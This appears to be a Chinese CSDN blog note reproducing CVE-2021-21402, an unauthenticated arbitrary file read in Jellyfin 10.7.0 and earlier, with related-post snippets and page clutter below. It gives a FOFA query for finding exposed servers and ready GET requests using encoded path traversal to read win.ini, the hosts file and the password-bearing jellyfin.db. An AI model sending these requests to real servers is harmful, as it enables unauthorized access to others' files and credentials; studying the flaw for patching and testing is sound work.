2021-04-29

最新推荐文章于 2023-06-17 06:00:00 发布
最新推荐文章于 2023-06-17 06:00:00 发布
阅读量420 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41503511/article/details/116274406
版权

漏洞名称:

Jellyfin - CVE-2021-21402 任意文件读取漏洞

影响版本:

10.7.0及更早版本

产品介绍:

Jellyfin 是一个自由的软件媒体系统,用于控制和管理媒体和流媒体。

漏洞复现:

fofa搜索语句:title=“jellyfin”

在这里插入图片描述

在这里插入图片描述

漏洞利用

可以读取未经身份验证的任意文件

/Audio/{Id}/hls/{segmentId}/stream.mp3
/Audio/{Id}/hls/{segmentId}/stream.aac

不管是.mp3还是.aac都是可以未经授权读取windows的文件的 看起来似乎是只能读取mp3或者.aac结尾的文件 其实并不然 通过在URL路径中使用斜杠,返回一个空扩展名,从而获得对结果文件路径的完全控制。

例如下面这样

GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/ HTTP/1.1
GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1

在这里插入图片描述

在这里插入图片描述

还可以读取host、读取带有密码的数据库

GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts/stream.mp3

GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
qq_41503511
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jellyfin任意文件读取漏洞(CVE-2021-21402)
逗比大师的博客
04-09 877
FOFA语句: title="Jellyfin" 可以通过访问 http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/ 读取任意文件。 POC: http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/strea...
CVE-2021-21402漏洞复现Jellyfin任意文件读取
weixin_52834047的博客
05-10 2213
1.漏洞描述 Jellyfin是一个自由软件媒体系统,在10.7.1版之前的Jellyfin中,攻击者可以通过精心构造的请求读取Jellyfin服务器端的任意文件,当使用Windows主机作为操作系统时,此问题将变得跟加普遍,该漏洞已在10.7.1版本中修复。 2.影响版本 Jellyfin<10.7.1 3.复现步骤 1.根据关键词在fofa上搜索包含该漏洞的网站 2.访问网站用burpsuite抓包 3.构造URL请求头 jellyfin.db将从服务器下载带有密码的...
经典Jellyfin 任意文件读取
吾所在处,即为净土
06-17 264
术之尽头,炁体源流
用Portainer安装Jellyfin媒体服务器(升级篇)
wbsu2004的博客
03-25 9721
Jellyfin 是一套开源的多媒体应用软件,可用于组织、管理和共享数字媒体文件。
vue2.0+vue-video-player
热门推荐
前端kk的博客
04-10 4万+
开整安装依赖npm install vue-video-player --save1引入样式// 第一个是videoJs的样式,后一个是vue-video-player的样式,因为考虑到我其他业务组件可能也会用到视频播放,所以就放在了main.js内 require('video.js/dist/video-js.css') require('vue-video-player/src/custom...
2021-04-09
HCZ_hhh的博客
04-09 398
2021-01-04
wubaoyu123的博客
01-04 2238
博客园Logo 首页 新闻 博问 专区 闪存 班级 代码改变世界 搜索 注册 登录 返回主页 知了一笑 博客园 首页 新随笔 联系 订阅 管理 数据仓库组件:Hive环境搭建和基础用法 本文源码:GitHub || GitEE 一、Hive基础简介 1、基础描述 Hive是基于Hadoop的一个数据仓库工具,用来进行数据提取、转化、加载,是一个可以对Hadoop中的大规模存储的数据进行查询和分析存储的组件,Hive数据仓库工具能将结构化的数据文件映射为一张数据库表,并提供SQL查询功能,能将SQL语句转变成
gtk3-runtime-3.24.29-2021-04-29-ts-win64.exe
07-10
gtk3-runtime-3.24.29-2021-04-29-ts-win64.exe
BOM_CX32l003最小系统板_2021-04-29.rar
04-29
标题中的"BOM_CX32l003最小系统板_2021-04-29.rar"指的是一个关于CX32l003微控制器的最小系统板的物料清单(Bill of Materials,BOM)文件压缩包,发布日期为2021年4月29日。在电子设计领域,最小系统板是指为了使微...
2021-04-29 CDD数据库编辑(一).pdf
12-17
CANdelaStudio是一款专用于编辑诊断数据库CDD的工具,主要服务于汽车行业的诊断需求规范。该工具具有模板导向的功能,允许用户以相似的结构描述不同的OEM需求,从而实现跨项目的诊断数据重用。此外,它还具备输入...
中国区块链企业发展研究报告[2021-04-29](78页).pdf
05-26
《中国区块链企业发展研究报告》是2019年12月由CCID赛迪区块链编写委员会编纂的一份详尽报告,旨在深入理解中国区块链企业的发展现状和趋势。报告由一系列行业专家顾问指导,并由多个知名机构联合发布,包括清华大学...
智能家居,为地产科技化赋能[2021-04-29](50页).pdf
05-26
【智能家居,为地产科技化赋能】的行业报告深入探讨了房地产行业中智能家居的崛起及其对地产科技化的影响。报告指出,自1999年以来,中央和地方政府发布了一系列政策,推动精装修和全装修市场的发展,这与地产行业的...
数据结构试题参考及答案.doc
08-29
内容概要:本资源提供了一份详尽的数据结构试题参考及答案,覆盖了从基础概念到复杂算法的多个层面。读者可以通过这份材料,系统地学习和复习数据结构的理论知识和应用实践,包括但不限于时间复杂度分析、线性表操作、树与图的遍历、排序算法等。 适合人群:适合计算机科学与技术专业的学生、准备数据结构考试或面试的研发人员,以及任何希望提升数据结构和算法知识的编程爱好者。 能学到什么: 1. 如何分析和计算算法的时间复杂度,掌握不同算法性能评估的方法。 2. 线性表的存储结构,包括顺序表和链表的特点及其操作实现。 3. 图和树的遍历算法,理解深度优先搜索和广度优先搜索的应用场景。 4. 排序算法的原理和实现,包括快速排序、归并排序等。 5. 哈希表的设计与冲突解决策略,理解哈希函数的重要性。 6. 递归算法和非递归算法的设计思想,学习如何选择合适的算法实现。 阅读建议:此资源不仅包含了数据结构的基础知识点,还提供了丰富的例题和解答,适合读者进行自我测试和深化理解。在学习过程中,建议结合实际编程实践,将理论知识应用到具体的算法实现中。同时,鼓励读者在理解的基础上,自行推导和验证答案,以加深记忆和理解。
有住网(装修小程序源码).zip
08-29
有住网(装修小程序源码).zip
d3dcsx_46.dll
08-29
Windows 8 SDK 此 SDK 于 2012 年 11 月发布,可用于创建适用于 Windows 8 或更早版本的 Windows 应用 () 使用 Web 技术、本机和托管代码;或使用本机或托管编程模型的桌面应用。
汇编语言I/O专题教程.ppt
最新发布
08-29
资源描述: 内容概要:《汇编语言》资源是一本深入浅出介绍汇编编程语言的教程,覆盖了从基础语法到高级程序设计技巧的全方位知识。通过本教程,读者将学习到汇编语言的基本概念、输入输出程序设计、中断处理、以及如何利用汇编语言直接控制硬件等核心内容。 适合人群:本资源适合对计算机底层工作原理感兴趣的学习者,包括计算机科学专业的学生、嵌入式系统开发者、硬件工程师以及任何希望深入理解计算机系统工作的编程爱好者。 能学到什么: 1. 汇编语言的基础知识,包括指令集、寄存器使用、内存管理等。 2. I/O设备的数据传送方式,如无条件传送、查询式传送和中断传送方式。 3. 程序直接控制I/O方式,包括I/O端口的使用、I/O指令的应用以及实际的I/O程序设计示例。 4. 中断传送方式的工作原理和实现,包括中断类型、中断向量表、中断处理过程和中断优先级管理。 5. 汇编语言在性能优化和硬件交互中的应用,以及如何编写高效的I/O程序。 6. 实际的汇编程序设计技巧,如发声程序、打印字符程序和中断处理程序的编写。 阅读建议:此资源不仅注重代码的编写实现,也强调对汇编语言程序设计背后的原理和硬件操作的理解
提供题库的创建和管理,试卷的设计和管理,考试的安排和管理,灵活的评分系统,全面的分析系统以及及时的反馈系统.zip
08-29
提供题库的创建和管理,试卷的设计和管理,考试的安排和管理,灵活的评分系统,全面的分析系统以及及时的反馈系统,为用户量身打造适合自己
手写迷你mybatis框架,里面使用了mybatis设计模式和框架.zip
08-29
手写迷你mybatis框架,里面使用了mybatis设计模式和框架
net core将<OTA_InventoryCheckRQ EchoToken="487ef6b0-3526-45e3-81e7-0eac31754c10" Password="abc888888" PrimaryLangID="en-us" TimeStamp="2021-04-20 10:30:59" UserName="guowang" Version="1.000"> <POS> <Source> <RequestorID ID="elongID" Type="2"/> </Source> </POS> <HotelReservations> <HotelReservation> <RoomStay> <RoomTypes> <RoomType RoomTypeCode="5412309"/> </RoomTypes> <RatePlans> <RatePlan RatePlanCode="4674478"/> </RatePlans> <GuestCounts> <GuestCount AgeQualifyingCode="10" Count="2"/> <GuestCount AgeQualifyingCode="8" Count="0"/> </GuestCounts> <BasicPropertyInfo HotelCode="2525137"/> </RoomStay> <ResGlobalInfo> <RoomCount>10</RoomCount> <!-- 会员登记-开关露出 --> <MemberLevel>V1</MemberLevel> <TimeSpan End="2021-04-30" Start="2021-04-29"/> </ResGlobalInfo> </HotelReservation> </HotelReservations> </OTA_InventoryCheckRQ>的请求实例转换为application/x-www-form-urlencoded模型,key: Message,value: xml报文
05-28
<TimeSpan End='2021-04-30' Start='2021-04-29'/> </OTA_InventoryCheckRQ>"; var xmlDoc = new XmlDocument(); xmlDoc.LoadXml(xmlString); var formContent = new FormUrlEncodedContent(new[] { new ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值